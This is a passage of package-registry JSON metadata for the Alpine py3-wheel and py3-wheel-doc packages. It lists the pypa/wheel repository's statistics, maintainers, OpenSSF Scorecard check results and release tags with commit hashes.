epositories/pypa%2Fwheel/tags/0.5/manifests"}]},"repo_metadata_updated_at":"2025-10-30T04:12:39.239Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":27.31114632857897,"stargazers_count":9.755238598344778,"forks_count":7.571755590773023,"average":11.159535129424192},"purl":"pkg:apk/alpine/py3-wheel-doc?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.16","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-wheel-doc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-wheel-doc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-wheel-doc/dependencies","status":null,"funding_links":["https://github.com/sponsors/pypa"],"critical":null,"issue_metadata":{"last_synced_at":"2025-10-26T09:45:16.065Z","issues_count":109,"pull_requests_count":184,"avg_time_to_close_issue":48693272.43877551,"avg_time_to_close_pull_request":2636588.9515151517,"issues_closed_count":98,"pull_requests_closed_count":165,"pull_request_authors_count":37,"issue_authors_count":90,"avg_comments_per_issue":5.908256880733945,"avg_comments_per_pull_request":3.5217391304347827,"merged_pull_requests_count":140,"bot_issues_count":0,"bot_pull_requests_count":65,"past_year_issues_count":16,"past_year_pull_requests_count":34,"past_year_avg_time_to_close_issue":238596.63636363635,"past_year_avg_time_to_close_pull_request":890483.8846153846,"past_year_issues_closed_count":11,"past_year_pull_requests_closed_count":26,"past_year_pull_request_authors_count":11,"past_year_issue_authors_count":15,"past_year_avg_comments_per_issue":4.25,"past_year_avg_comments_per_pull_request":3.0588235294117645,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":8,"past_year_merged_pull_requests_count":23,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/issues","maintainers":[{"login":"jaraco","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"},{"login":"woodruffw","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/woodruffw"},{"login":"di","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/di"},{"login":"uranusjr","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/uranusjr"},{"login":"pradyunsg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pradyunsg"},{"login":"mayeut","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mayeut"},{"login":"alex","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alex"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/packages/py3-wheel-doc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/packages/py3-wheel-doc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/packages/py3-wheel-doc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/packages/py3-wheel-doc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/packages/py3-wheel-doc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/packages/py3-wheel-doc/codemeta","maintainers":[{"uuid":"alice@ayaya.dev","login":null,"name":"psykose","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=psykose","packages_count":90,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=psykose","role":null,"created_at":"2023-02-01T09:22:54.258Z","updated_at":"2023-02-01T09:22:54.258Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/maintainers/alice@ayaya.dev/packages"}],"registry":{"name":"alpine-v3.16","url":"https://pkgs.alpinelinux.org/packages?branch=v3.16","ecosystem":"alpine","default":false,"packages_count":17040,"maintainers_count":328,"namespaces_count":2,"keywords_count":2855,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":924},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.662Z","updated_at":"2026-06-10T05:18:19.682Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/namespaces"}},{"id":6117854,"name":"py3-wheel","ecosystem":"alpine","description":"built-package format for Python","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":[],"namespace":"main","versions_count":1,"first_release_published_at":"2022-04-10T20:50:54.000Z","latest_release_published_at":"2022-04-10T20:50:54.000Z","latest_release_number":"0.37.1-r0","last_synced_at":"2026-04-02T15:37:51.269Z","created_at":"2023-01-31T21:35:27.965Z","updated_at":"2026-04-02T15:37:51.269Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.16/main/x86_64/py3-wheel","install_command":"apk add py3-wheel","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":23174547,"uuid":"98346885","full_name":"pypa/wheel","owner":"pypa","description":"The official binary distribution format for Python","archived":false,"fork":false,"pushed_at":"2025-10-06T19:13:50.000Z","size":1827,"stargazers_count":539,"open_issues_count":14,"forks_count":171,"subscribers_count":30,"default_branch":"main","last_synced_at":"2025-10-30T00:35:00.752Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pypa.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-07-25T20:24:25.000Z","updated_at":"2025-10-29T13:00:22.000Z","dependencies_parsed_at":"2024-02-03T11:27:24.404Z","dependency_job_id":"c444d7cc-5eb9-412d-b647-9474b7b4096f","html_url":"https://github.com/pypa/wheel","commit_stats":{"total_commits":913,"total_committers":82,"mean_commits":"11.134146341463415","dds":0.6297918948521358,"last_synced_commit":"baf6bf89562cb42a0ca71cc1e804600b161952eb"},"previous_names":[],"tags_count":68,"template":false,"template_full_name":null,"purl":"pkg:github/pypa/wheel","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/sbom","scorecard":{"id":751706,"data":{"date":"2025-08-11","repo":{"name":"github.com/pypa/wheel","commit":"15b7577654e8bcd23e009c6bac036b65c11d8d8f"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5,"checks":[{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:50: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:56: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/publish.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:46","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned","Info:   0 out of   4 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Code-Review","score":2,"reason":"Found 8/27 approved changesets -- score normalized to 2","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/publish.yml:48","Warn: no topLevel permission defined: .github/workflows/publish.yml:1","Warn: no topLevel permission defined: .github/workflows/test.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.txt:0","Info: FSF or OSI recognized license: MIT License: LICENSE.txt:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/publish.yml:31"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":5,"reason":"SAST tool is not run on all commits -- score normalized to 5","details":["Warn: 6 commits out of 12 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-22T20:33:25.724Z","repository_id":23174547,"created_at":"2025-08-22T20:33:25.724Z","updated_at":"2025-08-22T20:33:25.724Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":281742688,"owners_count":26553720,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-30T02:00:06.501Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"pypa","name":"Python Packaging Authority","uuid":"647025","kind":"organization","description":"","email":"info@pypa.io","website":"https://www.pypa.io","location":"United States of America","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/647025?v=4","repositories_count":58,"last_synced_at":"2025-10-30T00:34:30.821Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/pypa","funding_links":["https://github.com/sponsors/pypa"],"total_stars":88807,"followers":2132,"following":0,"created_at":"2022-11-02T16:21:37.826Z","updated_at":"2025-10-30T00:34:30.821Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa/repositories"},"tags":[{"name":"0.46.1","sha":"7a0ea7f7c3dd73747e37368bb074cd0d9fb49259","kind":"commit","published_at":"2025-04-08T20:53:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1/manifests"},{"name":"0.46.0","sha":"1da658384bbfc14c091085bb98828e68368a1ed5","kind":"commit","published_at":"2025-04-03T09:39:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0/manifests"},{"name":"0.45.1","sha":"7855525de4093257e7bfb434877265e227356566","kind":"commit","published_at":"2024-11-23T00:14:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1/manifests"},{"name":"0.45.0","sha":"d78f0e372199f8294556345d867af4d3cf118418","kind":"commit","published_at":"2024-11-08T21:40:06.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0/manifests"},{"name":"0.44.0","sha":"7bb46d7727e6e89fe56b3c78297b3af2672bbbe2","kind":"commit","published_at":"2024-08-04T14:48:22.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.44.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0/manifests"},{"name":"0.43.0","sha":"fa33dfd01fd665c1fd90097563b34bce4b5527ef","kind":"commit","published_at":"2024-03-11T19:28:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.43.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0/manifests"},{"name":"0.42.0","sha":"63a09bb3d92630c1d35f4fcc6f79250256aeeb5c","kind":"commit","published_at":"2023-11-26T14:35:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.42.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0/manifests"},{"name":"0.41.3","sha":"a899f1c69ffddf564b904a5de974457c213dc36a","kind":"commit","published_at":"2023-10-30T10:04:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3/manifests"},{"name":"0.41.2","sha":"e76040b0d970a0fe6211c31888fc929078ba02d9","kind":"commit","published_at":"2023-08-22T09:29:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2/manifests"},{"name":"0.41.1","sha":"b626a4a2ee6a887c7ad4b984fcb4d465dbfa337d","kind":"commit","published_at":"2023-08-05T13:31:27.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1/manifests"},{"name":"0.41.0","sha":"95c2d83cde174ed3c34d5a5b53dc3b3a1ace91b6","kind":"commit","published_at":"2023-07-22T10:59:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0/manifests"},{"name":"0.40.0","sha":"461f7a3a2d4824009ca4855b3300d61e6d405dc4","kind":"commit","published_at":"2023-03-14T14:38:44.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.40.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0/manifests"},{"name":"0.38.4","sha":"814c2efe8e40051039c5a6de6945e04ecdd162ee","kind":"commit","published_at":"2022-11-09T20:33:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4/manifests"},{"name":"0.38.3","sha":"daeb157c8207b1459fc7baa5f234c165a7a5faf4","kind":"commit","published_at":"2022-11-08T17:46:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3/manifests"},{"name":"0.38.2","sha":"44193907eb308930de05deed863fb4d157c5c866","kind":"commit","published_at":"2022-11-05T12:52:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2/manifests"},{"name":"0.38.1","sha":"6f1608dc1a88f00d2390b9044bd655753f39234c","kind":"commit","published_at":"2022-11-04T09:09:25.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1/manifests"},{"name":"0.38.0","sha":"fcb94cd51f7dfd40d88dff37415750d9e3638d3b","kind":"commit","published_at":"2022-10-20T21:19:31.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0/manifests"},{"name":"0.37.1","sha":"c716c87ffa528ac9a31de3ed3217058848dc2cd2","kind":"commit","published_at":"2021-12-22T12:19:07.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1/manifests"},{"name":"0.37.0","sha":"b8c4aa055cea0132776e7e53edce3538710d5b68","kind":"commit","published_at":"2021-08-09T20:44:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0/manifests"},{"name":"0.36.2","sha":"4fb47f98550f3f43fc0b8c73f518592124ae21bd","kind":"commit","published_at":"2020-12-13T18:07:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2/manifests"},{"name":"0.36.1","sha":"64550e15fdbc96d5690dc872257edc859c218068","kind":"commit","published_at":"2020-12-04T14:00:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1/manifests"},{"name":"0.36.0","sha":"39b6397ba944d82f1fe37d043382f97b78a919d6","kind":"commit","published_at":"2020-12-01T08:52:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0